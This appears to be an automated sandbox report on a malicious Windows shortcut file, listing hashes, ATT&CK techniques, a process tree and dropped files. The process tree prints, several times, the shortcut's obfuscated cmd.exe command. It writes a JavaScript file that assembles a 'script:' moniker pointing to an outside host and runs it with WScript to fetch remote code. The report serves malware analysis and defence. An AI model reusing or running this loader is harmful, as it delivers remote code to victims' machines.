7515eeb5904470fe1fbacc9005d77b22a1c6163280ce63b46623614a00147f9b

General

Target

Larissa_Souza_58779700.lnk
Size

1KB
MD5

32e1a707c633d451b49a8355491c6ef3
SHA1

271eadef876a9dc366a8fdd1ab732b1dc4d8b5d9
SHA256

89c884496d55a37a2fa23679f636a226b15b2391c7c8970fafdc8c7febcdcfcb
SHA512

89d7e35b947cc69e92cf85ddd4b46930cb20bff3112cf70b01026c503c3e409de0271914d9e8dc6f59960d7c15f36e63f13f983acb3f70e295afb6e1eb89764c

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings	cmd.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1164	conhost.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 5016 wrote to memory of 1164	5016	cmd.exe	89
PID 5016 wrote to memory of 1164	5016	cmd.exe	89
PID 1164 wrote to memory of 3956	1164	conhost.exe	90
PID 1164 wrote to memory of 3956	1164	conhost.exe	90
PID 3956 wrote to memory of 4508	3956	cmd.exe	91
PID 3956 wrote to memory of 4508	3956	cmd.exe	91
PID 3956 wrote to memory of 4368	3956	cmd.exe	92
PID 3956 wrote to memory of 4368	3956	cmd.exe	92
PID 4368 wrote to memory of 1652	4368	cmd.exe	93
PID 4368 wrote to memory of 1652	4368	cmd.exe	93

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Larissa_Souza_58779700.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5016
- C:\Windows\System32\conhost.exe
  "C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "S^eT UNZ=C:\8KN5N1\&& mD !UNZ!>nul 2>&1&&S^eT XHSP=!UNZ!^MEEWPZJY.JS&&<nul set/p DYAM=var DYAM='\u006c\u0063\u004a\u002b\u0044\u006c\u0063\u004a\u002b\u0045\u006c\u0063\u004a\u002b\u0022\u002f\u002f\u0077\u0069\u0061\u0065\u0072\u002e\u0074\u0065\u0063\u0068\u006d\u0061\u0074\u0069\u0063\u002e\u0063\u006f\u006e\u0073\u0075\u006c\u0074\u0069\u006e\u0067\u002f\u003f\u0031\u002f\u0022\u0029\u003b';UNZ='\u003a\u0068\u0022\u003b\u0045\u006c\u0063\u004a\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';MEEW='\u0076\u0061\u0072\u0020\u0043\u006c\u0063\u004a\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u006c\u0063\u004a\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';XHSP=MEEW+UNZ+DYAM;PZJY=new Function(XHSP);PZJY(); >!XHSP!|caLl !XHSP!||caLl !XHSP! "
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /V/D/c "S^eT UNZ=C:\8KN5N1\&& mD !UNZ!>nul 2>&1&&S^eT XHSP=!UNZ!^MEEWPZJY.JS&&<nul set/p DYAM=var DYAM='\u006c\u0063\u004a\u002b\u0044\u006c\u0063\u004a\u002b\u0045\u006c\u0063\u004a\u002b\u0022\u002f\u002f\u0077\u0069\u0061\u0065\u0072\u002e\u0074\u0065\u0063\u0068\u006d\u0061\u0074\u0069\u0063\u002e\u0063\u006f\u006e\u0073\u0075\u006c\u0074\u0069\u006e\u0067\u002f\u003f\u0031\u002f\u0022\u0029\u003b';UNZ='\u003a\u0068\u0022\u003b\u0045\u006c\u0063\u004a\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';MEEW='\u0076\u0061\u0072\u0020\u0043\u006c\u0063\u004a\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u006c\u0063\u004a\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';XHSP=MEEW+UNZ+DYAM;PZJY=new Function(XHSP);PZJY(); >!XHSP!|caLl !XHSP!||caLl !XHSP! "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3956
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" set/p DYAM=var DYAM='\u006c\u0063\u004a\u002b\u0044\u006c\u0063\u004a\u002b\u0045\u006c\u0063\u004a\u002b\u0022\u002f\u002f\u0077\u0069\u0061\u0065\u0072\u002e\u0074\u0065\u0063\u0068\u006d\u0061\u0074\u0069\u0063\u002e\u0063\u006f\u006e\u0073\u0075\u006c\u0074\u0069\u006e\u0067\u002f\u003f\u0031\u002f\u0022\u0029\u003b';UNZ='\u003a\u0068\u0022\u003b\u0045\u006c\u0063\u004a\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';MEEW='\u0076\u0061\u0072\u0020\u0043\u006c\u0063\u004a\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u006c\u0063\u004a\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';XHSP=MEEW+UNZ+DYAM;PZJY=new Function(XHSP);PZJY(); 0<nul 1>C:\8KN5N1\MEEWPZJY.JS"
      4⤵
      PID:4508
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" caLl C:\8KN5N1\MEEWPZJY.JS"
      4⤵
      Checks computer location settings
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:4368
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\8KN5N1\MEEWPZJY.JS"
        5⤵
        
        PID:1652

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\8KN5N1\MEEWPZJY.JS

Filesize
738B

MD5
d22fef9cb5d5c511cad69edd620ed80a

SHA1
4b2e7ff9e2ce9f22365a3ebcd537b5cb9300c072

SHA256
51c1271de007ab9b1bd5cdda17d5ad083c505862ea845f7a33257415fe3b8178

SHA512
a611157df0a46689ef1b54e0292deeaeaf0fe112af063f2cfb4abef9e3a8d0282559c90d637f2e505ec58b83db888a056b4ae27832368603754b82b7bb39f024

Download Submit
C:\Users\Admin\AppData\Local\Temp\Larissa_Souza_58779700.lnk

Filesize
2KB

MD5
7e2e1020cd333609410e5e0ce0b28052

SHA1
176f77deb884301c9a743094d1fa8da5f283e46f

SHA256
aba7e38bb0bd83c61522dabb504ca9f27015d745469eadf1d31f7e04d211f221

SHA512
7f8343b0854413d104e231006d152f68db8f125aabaa6e9109f1d67c94d1da55a4c2a6f64b5f0b4d7fad928edfa0fe7a54f92e35fece60021f0478295d915b21

Download Submit

Analysis

Sharing